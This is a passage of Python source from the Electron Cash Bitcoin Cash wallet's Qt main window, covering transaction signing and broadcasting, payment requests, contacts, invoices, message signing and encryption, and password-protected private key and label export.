self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if fee < tx.estimated_size():
msg.append(_('Warning') + ': ' + _("You're using a fee less than 1000 sats/kb. It may take a very long time to confirm."))
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
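# Runs the broadcast on a worker thread: with an active payment request the signed
# transaction is submitted to the requestor via pr.send_payment() (with a refund
# address) and the invoice is marked paid on success; otherwise it is broadcast
# through the network. broadcast_done() reports the result on the GUI thread.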
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
status = True
else:
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
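# Parse a bitcoincash: URI and pre-fill the Send tab. URIs carrying an 'r' parameter
# (or a signed 'name') refer to a payment request, which is fetched asynchronously
# and handled via on_pr(); otherwise the address, amount, label/message and optional
# op_return fields are applied directly.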
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
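# Address converter tab: as the user types an address it is re-displayed in both
# CashAddr and legacy formats (the fields are blanked if the input does not parse).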
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = QLineEdit()
cash_address.setReadOnly(True)
legacy_address = QLineEdit()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
grid.addWidget(QLabel(_('Address to convert')), 0, 0)
grid.addWidget(source_address, 0, 1)
grid.addWidget(QLabel(_('Cash address')), 1, 0)
grid.addWidget(cash_address, 1, 1)
grid.addWidget(QLabel(_('Legacy address')), 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(addresses))):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=self.password_dialog,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electron Cash, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + self.msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
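# Deserialize a transaction from raw text; inputs that spend this wallet's own coins
# are annotated with their value so the fee can be computed for display.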
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx)
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electroncash import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoincash URI
if data.lower().startswith(NetworkConstants.CASHADDR_PREFIX + ':'):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
file_content = file_content.strip()
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electroncash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
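# Worker thread: export private keys one address at a time, emitting
# computing_privkeys_signal after each key, and stop early if the dialog is closed.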
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr.to_ui_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = json.loads(f.read())
if type(data) is not dict or (len(data) and not all(type(v) is str for v in data.values())):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error, ValueError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
